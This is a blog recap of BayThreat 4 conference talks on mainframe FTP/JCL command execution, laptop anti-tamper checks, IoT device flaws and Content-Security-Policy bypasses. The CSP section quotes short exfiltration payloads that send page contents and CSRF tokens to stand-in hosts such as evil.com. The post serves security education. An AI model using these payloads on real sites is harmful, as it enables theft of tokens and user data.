BayThreat 4 - Day One
The year is almost over, but the infosec community in the Bay Area shows no signs of slowing down with the fourth annual BayThreat conference happening this Friday and Saturday. I always loved smaller hacker cons for their much more personable feel and few carefully selected talks that you can see without missing a dozen others. I love BayThreat not only because it is a local event, but also due to the overall quality of the talks and organization being on par with many of the larger cons.
BayThreat 4 marks the return to the Hacker Dojo, albeit at a different location, which in my opinion is even better than the original. Below are a few writeups on the talks from the breaker track that I had a chance to attend.
- Hacking Mainframes Like a Boss
- Effective Hardware Anti-Tamper by Realtime Verification of Physically Unclonable Functions - Or how to thwart the "Evil Maid"
- Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts
- So You Want to Build A Burp Plugin?
- Bypassing Content-Security-Policy
Hacking Mainframes Like a Boss
If you ever wanted to "Hack the Gibson" or just interested in attacking obscure yet highly sensitive targets this talk was a real treat. George Sarbanes &0xBA115 Polivka and Phillip Soldier of Fortran gave an excellent presentation on z/OS mainframes and several exploits. Apparently z/OS FTP servers can be used to execute arbitrary commands by uploading a JCL file and calling
SITE FILE=JES command. Check out MainTP and ftp_jcl_app.rb to test out the code yourself.
Phillip and George were nice enough to set up an emulated z/OS server for us to play with, but if you want to try out the exploits yourself install The Hercules z/Architecture Emulator on your personal computer.
The main message of the talk was to encourage security researchers to take a look at mainframe security. Because of their relative obscurity a lot of vulnerabilities that were discovered and patched in more mainstream systems are waiting to be discovered on these aging giants.
- Soldier of Fortran Blog - a collection of articles, utilities, rexx scripts, exploits, ascii art and sexy mainframe advertising pamphlets.
- Soldier of Fortran Github - source repository for MainTP and other mainframe security tools.
- chief4scot Github - metasploit fork with the new Z/architecture and the
- The Hercules - z/Architecture Emulator
Effective Hardware Anti-Tamper by Realtime Verification of Physically Unclonable Functions - Or how to thwart the "Evil Maid"
The presentation by Eric Michaud (Rift Recon) and Ryan Lacket (CryptoSeal, Havenco, MetaColo and a few other ventures) introduced a novel methodology for visual detection of tampering with sensitive equipment such as a company laptop. Their concept works by taking pictures of a laptop fitted with tamper evident stickers before and after leaving the device unattended. A case of a classic "Evil Maid" attack. By utilizing computer vision algorithms on your smartphone they made it possible to cheaply and effectively detect evidence of tampering.
Naturally the approach is not full proof, but considering just how cheap and effective it is to implement this, I think the final app, called Verifier, should be a pretty effective additional layer of defense.
Other than the main presentation, I liked fun stories form the trenches such as AirFrance bugging first class seats to using rf emanations to detect unlicensed software copies running in the room.
- Cryptoseal Verifier - Future location of the app once it goes public.
Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts
A fun talk about the lack of security in many Internet enabled and remotely controlled home gadgets all while getting a private tour of Nitesh Dhanjani's apartment =].
Phillips Hue Lighting System generates a username token used to authenticate to the wireless bridge by simply MD5-ing the mac address of the authenticating device (iPhone). Nitesh showed a video of an attack where he enumerated all of the connected devices on the network, obtained their MAC addresses and tried all of them to perform an action on the bridge. Once the attack script found a registered device, it went into a loop issuing the lights off command causing a continuous blackout.
Belkin WeMo Baby Monitor allowed connection from any smartphone with the WeMo smartphone app on the local network. After the initial connection to the baby monitor, the smartphone app obtained a unique identifier which could be used to listen in to the audio stream on the baby monitor from any point on the internet. Belkin WeMo Switch had the same issue as the baby monitor: connect once, connect from anywhere.
Belkin NetCam used a different infrastructure and required authentication over SSL. However, apparently the NetCam periodically sent login and password to a 3rd party box on the Internet in clear text.
- Nitesh Dhanjani Blog.
- Reconsidering the Perimeter Security - paper covering Belkin device hacks.
- Hacking Lightbulbs: Security Evaluation of the Phillips hue Personal Wireless Lighting.
So You Want to Build A Burp Plugin?
An educational talk by Monika Morrow introducing viewers to Burp plugin development in Java. Monika covered a new set of Burp APIs and illustrated several complete plugins to modify traffic and enhance Burp experience with additional context menus and notifications.
A comprehensive talk by Alex kuza55 Kouzemtchenko on subverting CSP with a sample goal of leaking CSRF tokens embedded in the body of the page. Several classes of bypasses were demonstrated in the presentation:
Dangling Markup Injection involved the use of the classic img-src , form-action , button, option, font-src * etc. to embed half-completed markgup (e.g
<form action='http://evil.com/log.cgi'><textarea>) so that the page in its entirety including whatever hidden CSRF token would be submitted to the attacker page.
Abusing CSS3 selectors to sequentially extract csrf token values. This trick works by using a targeted CSS selector
input[name=csrf_token][value=^a] and triggering the corresponding action to the attacker's site using
background-image: background-image: url(http://attacker/log?^a)
Abusing SVG Files to leak page contents and do a lot more damage.
Using user installed plugins such as Flash, Adobe Reader, etc. to abuse plugin specific functionality (e.g. ExternalInterface.call).
Next, Alex went into a separate class of application specific attacks using JSONP callbacks, browser specific flaws or just abusing unsafe-evals in sites' scripts.
I found attacks utilizing Content Delivery Networks like Akamai particularly interesting because of them exposing your site by hosting vulnerable versions of scripts on the same shared domain as you regardless of the scripts that your site actually uses.
To finish off the presentation, Alex covered some of the browser mitigations to the above attack vectors and how to bypass them once more.
I would highly recommend going over Alex's presentation with a fine comb as a comprehensive guide on various injection and bypass attack vectors in modern browsers once slides become available.
- W3C Selectors Level 3
- The image that called me - Active Content Injection with SVG Files
- Attacking Rich Internet Applications
- Scriptless Attacks - Stealing the Pie Without Touching the Still
Not bad for the first day, time to get some sleep and get ready for more excellent people and talks tomorrow.
baythreat 4 - day two
After a great day of hanging out with old and new friends all while getting inspired to start breaking/researching anything ranging from 50 year old behemoths to Internet enabled light bulbs, I raced down peninsula to the epicenter of Bay Area's security community at Hacker Dojo. Baythreat Day Two has begun.
In a terrible miscalculation of a sleeping schedule I have regretfully missed several morning talks; however, below are the writeups of another series of excellent presentations from the breaker track for the remainder of the day. Read more.
isec open forum bay area
It feels like the infosec community in the Bay Area is just getting warmed up toward the end of the year with another quarterly iSec Open Forum. As a small and local security event, it usually hosts novel security topics from local security professionals that may not appear in more mainstream events. After getting to the talks area at the end of a long hall with folks from Dropbox zooming by on their skateboards and razorblades, I found an infosec crowd of about a hundred or so people ready to learn and connect.
Below are my notes from the event: Read more.
All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.